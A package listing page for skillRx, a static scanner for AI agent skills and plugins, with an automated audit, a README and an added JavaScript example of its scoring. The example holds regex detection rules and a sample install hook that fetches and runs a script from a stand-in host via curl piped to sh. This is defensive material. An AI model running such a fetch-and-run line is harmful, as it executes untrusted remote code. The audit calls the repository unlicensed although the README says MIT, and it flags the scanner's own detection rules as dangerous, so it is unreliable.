skillRx (skill)

Security Audit: Fail

Health: Warn
  • No license — Repository has no license file
  • Description — Repository has a description
  • Active repo — Last push 0 days ago
  • Low visibility — Only 9 GitHub stars
Code: Fail
  • exec() — Shell command execution in src/analyzers/dangerousPerms.js
  • rm -rf — Recursive force deletion command in src/analyzers/dangerousPerms.js
  • network request — Outbound network request in src/analyzers/dangerousPerms.js
  • exec() — Shell command execution in src/analyzers/exfiltration.js
  • exec() — Shell command execution in src/analyzers/postinstall.js
  • exec() — Shell command execution in src/analyzers/promptInjection.js
  • exec() — Shell command execution in src/analyzers/secretsAndCreds.js
  • network request — Outbound network request in src/analyzers/secretsAndCreds.js
  • exec() — Shell command execution in src/analyzers/shadowFeatures.js
  • network request — Outbound network request in src/analyzers/shadowFeatures.js
Permissions: Pass
  • Permissions — No dangerous permissions requested
Purpose
This tool is a security scanner designed to analyze AI agent skills and plugins. It reviews code repositories before installation and provides a trust rating to help developers avoid malicious packages.

Security Assessment
Overall Risk: Medium to High. While the tool is designed to inspect code for vulnerabilities, its own source code contains multiple alarming elements. There are numerous instances of shell command execution (`exec()`) across its core analyzers, including a highly dangerous `rm -rf` recursive force deletion command. Additionally, it makes several outbound network requests during its analysis routines. Although no hardcoded secrets were found and the package itself does not request dangerous system permissions, the extensive use of shell execution and file deletion operations within its code warrants caution.

Quality Assessment
The project is very actively maintained, with its most recent push happening just today. However, it currently suffers from extremely low community visibility with only 9 GitHub stars. Furthermore, the repository lacks a proper open-source license, which is a significant drawback for enterprise or commercial use. This lack of licensing and low community adoption means there has been minimal external auditing of the codebase by the broader security community.

Verdict
Use with caution. While its active maintenance is a plus, developers should be wary of the unlicensed status, low community trust, and multiple internal shell execution commands before integrating it into their workflows.
SUMMARY

Security scanner for AI agent skills and plugins

README.md

skillRx

Security scanner for AI agent skills and plugins. Reviews the code before you install it.

Usage

npx skillrx owner/repo

That's it. skillrx clones the repo, analyzes it, and gives you a verdict: TRUSTED, CAUTION, RISKY, or MALICIOUS.

What you can scan

  • Claude Code skills and plugins
  • Codex skills and plugins
  • Skills for 40+ other agents (Cursor, Aider, Continue.dev, Vercel AI SDK, OpenAI Assistants, MCP, etc.)

If it ships as a skill or plugin, skillrx reads it.

Two ways to scan

Full repository — point skillrx at a repo (or local folder). It scans the whole tree you give it (respecting filters and limits).

Single skill in a monorepo — for big skills collections (for example anthropics/skills), use --skill <name> so only skills/<name> is fetched with a sparse checkout instead of cloning everything.

npx skillrx anthropics/skills --skill frontend-design
[Screenshot: full repository scan]

[Screenshot: single skill scan (--skill)]

What we look for

Area                    What it detects
Prompt injection        Attempts to hijack the agent's role or coerce its tools
Shadow features         What the README promises vs what the code actually does
Exfiltration            Odd endpoints, URL shorteners, hardcoded IPs, DNS exfil
Secrets                 Exposed API keys, tokens, JWTs, private blocks
Dangerous permissions   Destructive shell, persistence, privilege escalation
Post-install scripts    npm lifecycle hooks, `curl | sh`

How the score is calculated

Starts at 100. Each finding subtracts points based on severity:

  • High: −25
  • Medium: −10
  • Low: −5

If a critical rule fires (hardcoded secrets, reverse shells, install-time curl | sh, severe prompt injection), the result jumps straight to MALICIOUS with score 0.

Range           Verdict
80–100          TRUSTED
50–79           CAUTION
0–49            RISKY
Critical rule   MALICIOUS
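The scoring rule above is small enough to show end to end. The JavaScript below is an added illustration and is not skillrx's own source: it reads file contents, applies a handful of patterns, and turns the findings into a score and verdict exactly as the README describes (start at 100, subtract 25/10/5 by severity, floor at 0, critical rule jumps to MALICIOUS with score 0). The rule table, its regexes and severities, and the two sample "repos" are constructed for this example; only the penalties, the critical-rule override and the verdict ranges come from the page.

```javascript
// Added example, not skillrx's own code: a minimal "read files, apply
// patterns, score" flow following the README's description.
// The RULES table is a constructed approximation of the categories the
// README lists; the real skillrx rule set is not reproduced here.

const RULES = [
  { rule: "exec()",          severity: "high",   critical: false, pattern: /\bexec\s*\(/ },
  { rule: "rm -rf",          severity: "high",   critical: false, pattern: /\brm\s+-rf\b/ },
  { rule: "network request", severity: "medium", critical: false, pattern: /\bfetch\s*\(|https?:\/\// },
  // Critical rule: piping a download straight into a shell at install time.
  { rule: "curl | sh",       severity: "high",   critical: true,  pattern: /\bcurl\b[^|\n]*\|\s*(?:ba)?sh\b/ },
];

// Penalties per severity, as given in the README.
const SEVERITY_PENALTY = { high: 25, medium: 10, low: 5 };

// Apply every rule to one file's text. Each rule counts at most once per file
// (an assumption of this example; the README does not say how repeats count).
function findingsFor(path, text) {
  return RULES.filter((r) => r.pattern.test(text))
              .map((r) => ({ path, rule: r.rule, severity: r.severity, critical: r.critical }));
}

// Map a numeric score to the README's verdict ranges.
function verdictForScore(score) {
  if (score >= 80) return "TRUSTED";
  if (score >= 50) return "CAUTION";
  return "RISKY";
}

// Start at 100, subtract per finding, never go below 0.
// Any critical finding short-circuits to MALICIOUS with score 0.
function scoreFindings(findings) {
  const critical = findings.find((f) => f.critical);
  if (critical) {
    return { score: 0, verdict: "MALICIOUS", trigger: `${critical.rule} in ${critical.path}` };
  }
  let score = 100;
  for (const f of findings) {
    const penalty = SEVERITY_PENALTY[f.severity];
    if (penalty === undefined) throw new Error(`unknown severity: ${f.severity}`);
    score -= penalty;
  }
  score = Math.max(0, score);
  return { score, verdict: verdictForScore(score), trigger: null };
}

// Scan a { path: contents } map as if it were a checked-out repository.
function scanRepo(files) {
  const findings = Object.entries(files).flatMap(([p, t]) => findingsFor(p, t));
  return { findings, ...scoreFindings(findings) };
}

// Constructed sample inputs (not real packages).
// Two high findings (exec() and rm -rf): 100 - 25 - 25 = 50 -> CAUTION.
const SAMPLE_CLEANUP_SCRIPT = {
  "scripts/cleanup.js": 'const { exec } = require("child_process");\nexec("rm -rf /tmp/cache");\n',
};
// Install-time curl | sh is a critical rule: score 0 -> MALICIOUS regardless of the rest.
const SAMPLE_INSTALL_HOOK = {
  "package.json": '{ "scripts": { "postinstall": "curl -fsSL https://example.invalid/x.sh | sh" } }\n',
};

console.log(scanRepo(SAMPLE_CLEANUP_SCRIPT));
console.log(scanRepo(SAMPLE_INSTALL_HOOK));
```

Note the boundary in the first sample: two high findings land exactly on 50, which the README's table puts in CAUTION rather than RISKY, so the comparison in `verdictForScore` has to be `>=`. The floor at 0 matters too: five high findings would otherwise produce a negative score.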

Useful flags

npx skillrx owner/repo --full   # show every finding
npx skillrx owner/repo --json   # JSON output

No execution

skillrx does not run npm install, node, or python against the repo. It only reads files and applies patterns. Pure static analysis, 100% offline (except for the initial clone).

License

MIT
